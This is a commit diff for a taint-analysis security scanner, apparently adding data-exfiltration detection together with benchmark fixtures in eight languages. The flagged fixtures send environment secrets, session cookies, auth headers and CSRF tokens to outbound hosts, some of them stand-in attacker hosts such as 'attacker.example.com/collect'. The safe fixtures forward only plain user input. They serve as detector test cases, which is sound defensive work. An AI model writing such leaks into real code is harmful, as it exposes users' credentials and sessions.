Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers * feat: Implement cross-file data exfiltration detection with parameter-specific gate filters * feat: Add calibration tests and refine DATA_EXFIL severity scoring logic * feat: Introduce per-detector configuration for data exfiltration suppression * feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output * feat: Add tainted body and URL handling for data exfiltration detection * feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go * feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients * feat: Add synthetic externals handling for closure-captured variables in SSA * feat: Implement closure-based suppression for resource leak findings * feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns * feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders * feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt * feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests * feat: Add data exfiltration sinks for various languages and enhance documentation * refactor: Simplify formatting and improve readability in various files * refactor: Improve readability by simplifying conditional statements and adding clippy linting * docs: Update CHANGELOG and comments for data exfiltration features and configuration * docs: Clarify configuration instructions for data exfiltration trusted destinations * docs: Enhance comments for evidence routing logic in data exfiltration
2026-06-27 20:29:39 +02:00 · 2026-05-01 10:59:52 -04:00 · 2026-05-01 10:59:52 -04:00 · 58f1794a4e
commit 58f1794a4e
parent a438886217
189 changed files with 8421 additions and 383 deletions
--- a/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c
+++ b/tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c
@ -0,0 +1,17 @@
+// DATA_EXFIL: env-config (Sensitive source) flows into the gated
+// curl_easy_setopt sink at the CURLOPT_POSTFIELDS activation. The
+// destination URL is set by a separate CURLOPT_URL setopt above; only
+// the body-binding setopt fires DATA_EXFIL.
+#include <curl/curl.h>
+#include <stdlib.h>
+
+void leak_env(void) {
+    char *token = getenv("AUTH_TOKEN");
+    if (!token) return;
+
+    CURL *curl = curl_easy_init();
+    curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
+    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
+    curl_easy_perform(curl);
+    curl_easy_cleanup(curl);
+}
--- a/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c
+++ b/tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c
@ -0,0 +1,16 @@
+// DATA_EXFIL safe: plain user input via fgets/stdin forwarded into the
+// CURLOPT_POSTFIELDS body of a fixed-URL curl request must not fire.
+// Sensitivity-gate strips the cap for Plain-tier sources.
+#include <curl/curl.h>
+#include <stdio.h>
+
+void forward_stdin(void) {
+    char input[256];
+    if (!fgets(input, sizeof(input), stdin)) return;
+
+    CURL *curl = curl_easy_init();
+    curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
+    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
+    curl_easy_perform(curl);
+    curl_easy_cleanup(curl);
+}
--- a/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go
+++ b/tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go
@ -0,0 +1,14 @@
+// DATA_EXFIL: a session cookie (Sensitive source) flows into the body
+// of http.Post() at a hardcoded destination URL.
+package fixture
+
+import (
+	"net/http"
+	"strings"
+)
+
+func leakCookie(r *http.Request) {
+	c, _ := r.Cookie("session")
+	body := strings.NewReader(c.Value)
+	http.Post("https://analytics.internal/track", "text/plain", body)
+}
--- a/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go
+++ b/tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go
@ -0,0 +1,15 @@
+// DATA_EXFIL safe: plain attacker-controlled user input forwarded to a
+// fixed-destination http.Post body must not fire. Sensitivity-gate
+// strips the cap because the source is Plain-tier user input.
+package fixture
+
+import (
+	"net/http"
+	"strings"
+)
+
+func forwardUserInput(r *http.Request) {
+	msg := r.FormValue("msg")
+	body := strings.NewReader(msg)
+	http.Post("https://analytics.internal/track", "text/plain", body)
+}
--- a/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java
+++ b/tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java
@ -0,0 +1,23 @@
+// DATA_EXFIL: a Sensitive cookie source flows through
+// BodyPublishers.ofString() into the request builder chain and finally
+// into client.send() at a hardcoded destination URL.
+import java.net.URI;
+import java.net.http.HttpClient;
+import java.net.http.HttpRequest;
+import java.net.http.HttpRequest.BodyPublishers;
+import java.net.http.HttpResponse.BodyHandlers;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+
+public class DataExfilJdkHttpClient {
+    public void leak(HttpServletRequest request) throws Exception {
+        Cookie[] cookies = request.getCookies();
+        String session = cookies[0].getValue();
+        HttpClient client = HttpClient.newHttpClient();
+        HttpRequest req = HttpRequest.newBuilder()
+            .uri(URI.create("https://analytics.internal/track"))
+            .POST(BodyPublishers.ofString(session))
+            .build();
+        client.send(req, BodyHandlers.ofString());
+    }
+}
--- a/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java
+++ b/tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java
@ -0,0 +1,24 @@
+// DATA_EXFIL: an OkHttp two-step where a session attribute (Sensitive
+// source) is wrapped via RequestBody.create and bound to a request
+// targeting a hardcoded URL. The chain-normalized newCall.execute
+// matcher fires DATA_EXFIL on the body bind.
+import javax.servlet.http.HttpSession;
+import okhttp3.MediaType;
+import okhttp3.OkHttpClient;
+import okhttp3.Request;
+import okhttp3.RequestBody;
+import okhttp3.Response;
+
+public class DataExfilOkHttp {
+    public void leak(HttpSession session) throws Exception {
+        String token = (String) session.getAttribute("csrfToken");
+        OkHttpClient client = new OkHttpClient();
+        RequestBody body = RequestBody.create(
+            token, MediaType.parse("text/plain"));
+        Request req = new Request.Builder()
+            .url("https://analytics.internal/track")
+            .post(body)
+            .build();
+        Response resp = client.newCall(req).execute();
+    }
+}
--- a/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js
+++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js
@ -0,0 +1,10 @@
+// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
+// outbound body of fetch() at a fixed destination. SSRF must NOT fire
+// because the URL is a hardcoded literal.
+function leakBody(req) {
+    var payload = req.cookies.session;
+    fetch('/endpoint', {
+        method: 'POST',
+        body: payload,
+    });
+}
--- a/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js
+++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js
@ -0,0 +1,10 @@
+// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
+// outbound body of fetch() at an attacker-controlled host. SSRF stays
+// silent (URL is a static literal); DATA_EXFIL fires.
+function leakBodyExternal(req) {
+    var payload = req.cookies.session;
+    fetch('https://untrusted.example.com/intake', {
+        method: 'POST',
+        body: payload,
+    });
+}
--- a/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js
+++ b/tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js
@ -0,0 +1,9 @@
+// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
+// body of XMLHttpRequest.send(). The destination is a static literal, so
+// SSRF must not fire.
+function leakHeader(req) {
+    var auth = req.headers.authorization;
+    var xhr = new XMLHttpRequest();
+    xhr.open('POST', '/upstream');
+    xhr.send(auth);
+}
--- a/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js
+++ b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js
@ -0,0 +1,8 @@
+// DATA_EXFIL safe: routing a Sensitive cookie source through the named
+// telemetry boundary `logEvent` is the developer's explicit decision to
+// forward; the default Sanitizer(data_exfil) convention strips the cap.
+function track(req) {
+    logEvent({
+        user: req.cookies.session,
+    });
+}
--- a/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js
+++ b/tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js
@ -0,0 +1,10 @@
+// DATA_EXFIL safe: plain user input echoed into a fetch() body must not
+// fire. The user already controls req.body.message; surfacing it back
+// into the outbound payload is not a cross-boundary disclosure.
+function forwardUserMessage(req) {
+    var message = req.body.message;
+    fetch('/forward', {
+        method: 'POST',
+        body: message,
+    });
+}
--- a/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py
+++ b/tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py
@ -0,0 +1,17 @@
+import os
+from fastapi import FastAPI, Request
+import httpx
+
+app = FastAPI()
+
+
+# DATA_EXFIL: env-config secret flows into the json kwarg of an async
+# httpx.AsyncClient().post() at a fixed destination URL.
+@app.post('/sync-async')
+async def sync_async(req: Request):
+    api_key = os.environ.get('UPSTREAM_API_KEY')
+    await httpx.AsyncClient().post(
+        'https://upstream.internal/ingest',
+        json={'api_key': api_key},
+    )
+    return {'ok': True}
--- a/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py
+++ b/tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py
@ -0,0 +1,16 @@
+import os
+import requests
+from flask import Flask
+
+app = Flask(__name__)
+
+
+# DATA_EXFIL: env-config secrets accumulate into a dict, then flow as the
+# json kwarg of requests.post() at a fixed destination URL.
+@app.route('/upload-config', methods=['POST'])
+def upload_config():
+    payload = {}
+    payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
+    payload['region'] = os.environ.get('UPSTREAM_REGION')
+    requests.post('https://api.internal/ingest', json=payload)
+    return 'ok'
--- a/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py
+++ b/tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py
@ -0,0 +1,14 @@
+import requests
+from flask import Flask, request
+
+app = Flask(__name__)
+
+
+# DATA_EXFIL safe: plain user input echoed into a fixed-destination
+# requests.post body must not fire. Sensitivity-gate strips the cap
+# because the source is Plain-tier (raw user input).
+@app.route('/forward', methods=['POST'])
+def forward():
+    message = request.form.get('message')
+    requests.post('https://telemetry.internal/forward', json={'message': message})
+    return 'ok'
--- a/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb
+++ b/tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb
@ -0,0 +1,10 @@
+require 'net/http'
+require 'uri'
+
+# DATA_EXFIL: a session cookie (Sensitive source) flows into the body
+# of Net::HTTP.post at a fixed destination URL.
+def forward_session(request)
+  sid = request.cookies[:auth_token]
+  uri = URI('https://analytics.internal/track')
+  Net::HTTP.post(uri, "session=#{sid}")
+end
--- a/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb
+++ b/tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb
@ -0,0 +1,12 @@
+require 'rest-client'
+
+# DATA_EXFIL safe: plain user input echoed into a RestClient.post body
+# at a fixed destination URL must not fire. Sensitivity-gate strips the
+# cap for Plain-tier sources.
+def forward_message(params)
+  message = params[:message]
+  RestClient.post(
+    'https://telemetry.internal/forward',
+    { message: message }.to_json
+  )
+end
--- a/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs
+++ b/tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs
@ -0,0 +1,10 @@
+// DATA_EXFIL: env-config (Sensitive source) flows into reqwest's .form()
+// chain at a fixed destination URL. The form-encoded payload leaks the
+// operator-bound secret across the outbound boundary.
+fn exfil_form() {
+    let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap();
+    let _ = reqwest::Client::new()
+        .post("https://attacker.example.com/collect")
+        .form(&secret)
+        .send();
+}
--- a/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts
+++ b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts
@ -0,0 +1,10 @@
+// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
+// outbound body of fetch() at a fixed destination. SSRF must NOT fire
+// because the URL is a hardcoded literal.
+function leakBody(req: { cookies: { session: string } }): void {
+    const payload = req.cookies.session;
+    fetch('/endpoint', {
+        method: 'POST',
+        body: payload,
+    });
+}
--- a/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts
+++ b/tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts
@ -0,0 +1,10 @@
+// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
+// body of fetch() via the body field of the init object. Destination is
+// a static literal so SSRF must not fire.
+function leakHeader(req: { headers: { authorization: string } }): void {
+    const auth = req.headers.authorization;
+    fetch('https://analytics.internal/track', {
+        method: 'POST',
+        body: auth,
+    });
+}